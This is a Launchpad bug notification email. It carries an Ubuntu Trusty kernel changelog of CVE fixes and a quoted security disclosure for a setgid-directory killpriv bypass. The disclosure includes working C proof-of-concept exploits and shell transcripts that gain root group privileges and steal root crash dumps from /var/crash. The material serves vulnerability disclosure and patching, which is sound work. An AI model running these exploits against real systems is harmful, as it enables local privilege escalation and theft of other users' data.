This bug was fixed in the package linux - 3.13.0-157.207

---------------
linux (3.13.0-157.207) trusty; urgency=medium

  * linux: 3.13.0-157.207 -proposed tracker (LP: #1787982)

  * CVE-2017-5715 (Spectre v2 retpoline)
    - SAUCE: Fix "x86/retpoline/entry: Convert entry assembler indirect jumps"

  * CVE-2017-2583
    - KVM: x86: fix emulation of "MOV SS, null selector"

  * CVE-2017-7518
    - KVM: x86: fix singlestepping over syscall

  * CVE-2017-18270
    - KEYS: prevent creating a different user's keyrings

  * Update to upstream's implementation of Spectre v1 mitigation (LP: #1774181)
    - Documentation: Document array_index_nospec
    - array_index_nospec: Sanitize speculative array de-references
    - x86: Implement array_index_mask_nospec
    - x86: Introduce barrier_nospec
    - x86/get_user: Use pointer masking to limit speculation
    - x86/syscall: Sanitize syscall table de-references under speculation
    - vfs, fdtable: Prevent bounds-check bypass via speculative execution
    - nl80211: Sanitize array index in parse_txq_params
    - x86/spectre: Report get_user mitigation for spectre_v1
    - x86/kvm: Update spectre-v1 mitigation
    - nospec: Allow index argument to have const-qualified type
    - nospec: Move array_index_nospec() parameter checking into separate macro
    - nospec: Kill array_index_nospec_mask_check()
    - SAUCE: Replace osb() calls with array_index_nospec()
    - SAUCE: Rename osb() to barrier_nospec()
    - SAUCE: x86: Use barrier_nospec in arch/x86/um/asm/barrier.h

  * Prevent speculation on user controlled pointer (LP: #1775137)
    - x86: reorganize SMAP handling in user space accesses
    - x86: fix SMAP in 32-bit environments
    - x86: Introduce __uaccess_begin_nospec() and uaccess_try_nospec
    - x86/usercopy: Replace open coded stac/clac with __uaccess_{begin, end}
    - x86/uaccess: Use __uaccess_begin_nospec() and uaccess_try_nospec

  * CVE-2016-10208
    - ext4: validate s_first_meta_bg at mount time
    - ext4: fix fencepost in s_first_meta_bg validation

  * CVE-2018-10323
    - xfs: set format back to extents if xfs_bmap_extents_to_btree

  * CVE-2017-16911
    - usbip: prevent vhci_hcd driver from leaking a socket pointer address

  * CVE-2018-13406
    - video: uvesafb: Fix integer overflow in allocation

  * CVE-2018-10877
    - ext4: verify the depth of extent tree in ext4_find_extent()

  * CVE-2018-10881
    - ext4: clear i_data in ext4_inode_info when removing inline data

  * CVE-2018-1092
    - ext4: fail ext4_iget for root directory if unallocated

  * CVE-2018-1093
    - ext4: fix block bitmap validation when bigalloc, ^flex_bg
    - ext4: add validity checks for bitmap block numbers

  * CVE-2018-12233
    - jfs: Fix inconsistency between memory allocation and ea_buf->max_size

  * CVE-2017-16912
    - usbip: fix stub_rx: get_pipe() to validate endpoint number

  * CVE-2018-10675
    - mm/mempolicy: fix use after free when calling get_mempolicy

  * CVE-2017-8831
    - saa7164: fix sparse warnings
    - saa7164: fix double fetch PCIe access condition

  * CVE-2017-16533
    - HID: usbhid: fix out-of-bounds bug

  * CVE-2017-16538
    - media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner
    - media: dvb-usb-v2: lmedm04: Improve logic checking of warm start

  * CVE-2017-16644
    - hdpvr: Remove deprecated create_singlethread_workqueue
    - media: hdpvr: Fix an error handling path in hdpvr_probe()

  * CVE-2017-16645
    - Input: ims-psu - check if CDC union descriptor is sane

  * CVE-2017-5549
    - USB: serial: kl5kusb105: fix line-state error handling

  * CVE-2017-16532
    - usb: usbtest: fix NULL pointer dereference

  * CVE-2017-16537
    - media: imon: Fix null-ptr-deref in imon_probe

  * CVE-2017-11472
    - ACPICA: Add additional debug info/statements
    - ACPICA: Namespace: fix operand cache leak

  * CVE-2017-16643
    - Input: gtco - fix potential out-of-bound access

  * CVE-2017-16531
    - USB: fix out-of-bounds in usb_set_configuration

  * CVE-2018-10124
    - kernel/signal.c: avoid undefined behaviour in kill_something_info

  * CVE-2017-6348
    - irda: Fix lockdep annotations in hashbin_delete().

  * CVE-2017-17558
    - USB: core: prevent malicious bNumInterfaces overflow

  * CVE-2017-5897
    - ip6_gre: fix ip6gre_err() invalid reads

  * CVE-2017-6345
    - SAUCE: import sock_efree()
    - net/llc: avoid BUG_ON() in skb_orphan()

  * CVE-2017-7645
    - nfsd: check for oversized NFSv2/v3 arguments

  * CVE-2017-9984
    - ALSA: msnd: Optimize / harden DSP and MIDI loops

  * CVE-2018-1000204
    - scsi: sg: allocate with __GFP_ZERO in sg_build_indirect()

  * CVE-2018-10021
    - scsi: libsas: defer ata device eh commands to libata

  * CVE-2017-16914
    - usbip: fix stub_send_ret_submit() vulnerability to null transfer_buffer

  * CVE-2017-16913
    - usbip: fix stub_rx: harden CMD_SUBMIT path to handle malicious input

  * CVE-2017-16535
    - USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor()

  * CVE-2017-16536
    - cx231xx-cards: fix NULL-deref on missing association descriptor

  * CVE-2017-16650
    - net: qmi_wwan: fix divide by 0 on bad descriptors

  * CVE-2017-18255
    - perf/core: Fix the perf_cpu_time_max_percent check

  * CVE-2018-10940
    - cdrom: information leak in cdrom_ioctl_media_changed()

  * CVE-2018-13094
    - xfs: don't call xfs_da_shrink_inode with NULL bp

  * other users' coredumps can be read via setgid directory and killpriv bypass (LP: #1779923) // CVE-2018-13405
    - Fix up non-directory creation in SGID directories

  * CVE-2017-16529
    - ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor

  * CVE-2017-2671
    - ping: implement proper locking

  * CVE-2017-15649
    - packet: hold bind lock when rebinding to fanout hook
    - packet: in packet_do_bind, test fanout with bind_lock held

  * CVE-2017-16527
    - ALSA: usb-audio: Kill stray URB at exiting

  * CVE-2017-16526
    - uwb: properly check kthread_run return value

  * CVE-2017-11473
    - x86/acpi: Prevent out of bound access caused by broken ACPI tables

  * CVE-2017-14991
    - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE

  * CVE-2017-2584
    - KVM: x86: Introduce segmented_write_std

  * CVE-2018-10087
    - kernel/exit.c: avoid undefined behaviour when calling wait4()

  * fscache: Fix hanging wait on page discarded by writeback (LP: #1777029)
    - fscache: Fix hanging wait on page discarded by writeback

 -- Khalid Elmously <khalid.elmou...@canonical.com>  Mon, 20 Aug 2018 12:07:46 -0400

** Changed in: linux (Ubuntu Trusty)
       Status: Fix Committed => Fix Released

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-10208
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11472
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11473
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14991
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-15649
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16526
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16527
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16529
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16531
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16532
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16533
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16535
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16536
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16537
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16538
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16643
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16644
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16645
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16650
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16911
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16912
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16913
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16914
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17558
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18255
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18270
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2583
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2584
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2671
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5549
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5715
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5897
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6345
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6348
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7518
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7645
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8831
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9984
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1000204
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10021
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10087
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10124
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10675
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10877
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1092
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1093
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10940

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1779923

Title:
  other users' coredumps can be read via setgid directory and killpriv bypass

Status in linux package in Ubuntu:
  In Progress
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  In Progress

Bug description:
  Note: I am both sending this bug report to secur...@kernel.org and
  filing it in the Ubuntu bugtracker because I can't tell whether this
  counts as a kernel bug or as a Ubuntu bug. You may wish to talk to
  each other to determine the best place to fix this.

  I noticed halfdog's old writeup at
  https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ ,
  describing essentially the following behavior in combination with a
  trick for then writing to the resulting file without triggering the
  killpriv logic:

  =============
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat > demo.c
  #include <fcntl.h>
  int main(void) {
    open("dir/file", O_RDONLY|O_CREAT, 02755);
  }
  user@debian:~/sgid_demo$ gcc -o demo demo.c
  user@debian:~/sgid_demo$ ./demo
  user@debian:~/sgid_demo$ ls -l dir/file
  -rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
  =============

  Two patches for this were proposed on LKML back then:

  "[PATCH 1/2] fs: Check f_cred instead of current's creds in should_remove_suid()"
  https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/

  "[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
  https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/

  However, as far as I can tell, neither of them actually landed.

  You can also bypass the killpriv logic with fallocate() and mmap() -
  fallocate() permits resizing the file without triggering killpriv,
  mmap() permits writing without triggering killpriv (the mmap part is
  mentioned at
  https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/ ):

  =============
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat fallocate.c
  #define _GNU_SOURCE
  #include <stdlib.h>
  #include <fcntl.h>
  #include <err.h>
  #include <sys/mman.h>
  #include <sys/stat.h>
  #include <unistd.h>
  #include <string.h>

  int main(void) {
    int src_fd = open("/usr/bin/id", O_RDONLY);
    if (src_fd == -1) err(1, "open 2");
    struct stat src_stat;
    if (fstat(src_fd, &src_stat)) err(1, "fstat");
    int src_len = src_stat.st_size;
    char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
    if (src_mapping == MAP_FAILED) err(1, "mmap 2");

    int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
    if (fd == -1) err(1, "open");
    if (fallocate(fd, 0, 0, src_len)) err(1, "fallocate");
    char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if (mapping == MAP_FAILED) err(1, "mmap");
    memcpy(mapping, src_mapping, src_len);
    munmap(mapping, src_len);
    close(fd);
    close(src_fd);

    execl("./dir/file", "id", NULL);
    err(1, "execl");
  }
  user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
  user@debian:~/sgid_demo$ ./fallocate
  uid=1000(user) gid=1000(user) egid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
  =============

  sys_copy_file_range() also looks as if it bypasses killpriv on
  supported filesystems, but I haven't tested that one so far.

  On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie",
  and contains group-readable crashdumps in some custom format, so you
  can use this issue to steal other users' crashdumps:

  =============
  user@ubuntu-18-04-vm:~$ ls -l /var/crash
  total 296
  -rw-r----- 1 user whoopsie  16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
  -rw-r----- 1 root whoopsie  50706 Jun 25 21:51 _usr_bin_id.0.crash
  -rw-r----- 1 user whoopsie  51842 Jun 25 21:42 _usr_bin_id.1000.crash
  -rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
  -rw-r----- 1 root whoopsie  18765 Jun 26 00:42 _usr_bin_xattr.0.crash
  user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
  cat: /var/crash/_usr_bin_id.0.crash: Permission denied
  user@ubuntu-18-04-vm:~$ cat fallocate.c
  #define _GNU_SOURCE
  #include <stdio.h>
  #include <stdlib.h>
  #include <fcntl.h>
  #include <err.h>
  #include <sys/mman.h>
  #include <sys/stat.h>
  #include <unistd.h>
  #include <string.h>

  int main(int argc, char **argv) {
    if (argc != 2) {
      printf("usage: ./fallocate <file_to_read>");
      return 1;
    }

    int src_fd = open("/bin/cat", O_RDONLY);
    if (src_fd == -1) err(1, "open 2");
    struct stat src_stat;
    if (fstat(src_fd, &src_stat)) err(1, "fstat");
    int src_len = src_stat.st_size;
    char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
    if (src_mapping == MAP_FAILED) err(1, "mmap 2");

    unlink("/var/crash/privileged_cat"); /* in case we've already run before */
    int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
    if (fd == -1) err(1, "open");
    if (fallocate(fd, 0, 0, src_len)) err(1, "fallocate");
    char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if (mapping == MAP_FAILED) err(1, "mmap");
    memcpy(mapping, src_mapping, src_len);
    munmap(mapping, src_len);
    close(fd);

    execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
    err(1, "execl");
  }
  user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
  user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen
  user@ubuntu-18-04-vm:~$ ls -l /var/crash
  total 384
  -rwxr-sr-x 1 user whoopsie  35064 Jul  3 19:22 privileged_cat
  -rw-r----- 1 user whoopsie  16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
  -rw-r----- 1 root whoopsie  50706 Jun 25 21:51 _usr_bin_id.0.crash
  -rw-r--r-- 1 user whoopsie  50706 Jul  3 19:22 _usr_bin_id.0.crash.stolen
  -rw-r----- 1 user whoopsie  51842 Jun 25 21:42 _usr_bin_id.1000.crash
  -rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
  -rw-r----- 1 root whoopsie  18765 Jun 26 00:42 _usr_bin_xattr.0.crash
  user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
  user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
  user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen
  user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/
  user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump
  root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
  =============

  This bug is subject to a 90 day disclosure deadline. After 90 days
  elapse or a patch has been made broadly available (whichever is
  earlier), the bug report will become visible to the public.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1779923/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp